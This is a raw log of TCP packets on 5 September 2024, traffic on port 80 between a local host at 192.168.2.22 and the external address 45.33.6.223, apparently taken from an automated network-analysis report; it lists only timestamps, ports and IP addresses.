Sep 5, 2024 09:05:36.339929104 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.339940071 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.339958906 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.340286970 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.340306997 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.340317965 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.340332031 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.340341091 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.340517044 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.340531111 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.340567112 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.340954065 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.341003895 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.341008902 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.341022015 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.341054916 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.341068029 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.341083050 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.341095924 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.341126919 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.341140032 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.341869116 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.341881990 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.341892958 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.341919899 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.341931105 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.341959953 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.341973066 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.342003107 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.342716932 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.342763901 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.342767000 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.342777014 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.342806101 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.342816114 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.426862955 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.426877975 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.426889896 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.426901102 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.426913977 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.426953077 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.426966906 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.426991940 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.427033901 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.427050114 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.427061081 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.427086115 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.427093029 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.427109957 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.427123070 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.427135944 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.427153111 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.427166939 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.427251101 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.427918911 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.427972078 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.428035021 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.428045988 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.428083897 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.428083897 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.428138018 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.428148985 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.428163052 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.428185940 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.428196907 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.428770065 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.428781986 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.428795099 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.428818941 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.428838015 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.428844929 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.428857088 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.428869009 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.428878069 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.428900957 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.428914070 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.429666042 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.429677010 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.429689884 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.429714918 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.429728031 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.429728985 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.429740906 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.429754972 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.429769993 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.429778099 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.429785013 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.430583954 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.430596113 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.430607080 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.430635929 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.430653095 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.430690050 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.430700064 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.430712938 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.430726051 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.430743933 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.430748940 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.431446075 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.431463957 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.431476116 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.431488991 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.431493044 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.431493044 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.431502104 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.431513071 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.431514978 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.431529045 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.431529045 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.431545973 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.432271004 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.432320118 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.513757944 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.513770103 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.513780117 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.513840914 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.513868093 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.513904095 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.514003038 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.514014959 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.514025927 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.514038086 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.514050961 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.514050961 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.514065981 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.514081955 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.514219999 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.514229059 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.514264107 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.514273882 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.514887094 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.514898062 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.514914989 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.514925003 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.514936924 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.514941931 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.514947891 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.514952898 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.514960051 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.514965057 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.514971972 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.514982939 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.514982939 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.514992952 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.515010118 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.515022993 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.515055895 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.515568972 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.515579939 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.515590906 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.515619040 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.515630007 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.515647888 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.515660048 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.515671015 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.515682936 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.515682936 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.515698910 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.515698910 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.515702963 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.515713930 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.515718937 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.515743017 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.515743017 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.516545057 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.516556025 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.516566038 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.516602993 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.516613007 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.516632080 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.516642094 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.516653061 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.516663074 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.516665936 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.516674995 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.516679049 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.516690969 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.516693115 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.516700029 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.516716957 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.517513990 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.517524004 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.517534018 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.517563105 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.517570019 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.517580986 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.517592907 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.517602921 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.517616034 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.517618895 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.517638922 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.517651081 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.517659903 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.517672062 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.517692089 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.517702103 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.518476963 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.518526077 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.518606901 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.518651962 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.518657923 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.518663883 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.518673897 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.518691063 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.518702030 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.518755913 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.518765926 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.518775940 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.518805981 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.518805981 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.519526005 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.519536018 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.519546986 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.519576073 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.519587040 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.519673109 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.519685030 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.519695997 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.519707918 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.519721031 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.519731045 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.519747972 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.519804001 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.519815922 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.519850969 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.520906925 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.520917892 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.520929098 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.520966053 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.520966053 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.600872040 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.600884914 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.600895882 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.600960016 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.601062059 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.601073980 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.601083994 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.601097107 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.601104975 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.601109982 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.601121902 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.601123095 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.601130009 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.601144075 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.601155996 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.601157904 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.601166010 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.601176023 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.601186037 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.601191044 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.601195097 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.601208925 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.601208925 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.601218939 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.601227045 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.601236105 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.601237059 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.601253986 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.601267099 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.601325035 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.601336956 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.601347923 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.601377964 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.601392984 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.601538897 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.601550102 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.601562023 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.601589918 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.601600885 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.601640940 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.601653099 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.601666927 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.601680040 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.601680040 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.601686954 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.601700068 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.601718903 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.601845980 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.601857901 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.601900101 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.601922035 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.601959944 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.601988077 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.601999998 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.602026939 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.602039099 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.602040052 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.602063894 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.602088928 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.602113962 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.602125883 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.602138042 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.602149010 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.602155924 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.602175951 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.602296114 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.602307081 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.602317095 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.602330923 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.602339983 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.602354050 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.602369070 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.602488041 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.602499008 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.602526903 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.602538109 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.602539062 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.602554083 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.602574110 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.602668047 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.602679968 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.602690935 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.602701902 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.602709055 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.602714062 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.602730036 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.602737904 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.602745056 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.602755070 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.602756977 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.602767944 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.602781057 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.602790117 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.602792978 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.602804899 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.602806091 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.602813005 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.602830887 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.602838039 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.602864981 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.602869987 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.602878094 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.602888107 CEST	80	49164	45.33.6.223	192.168.2.22
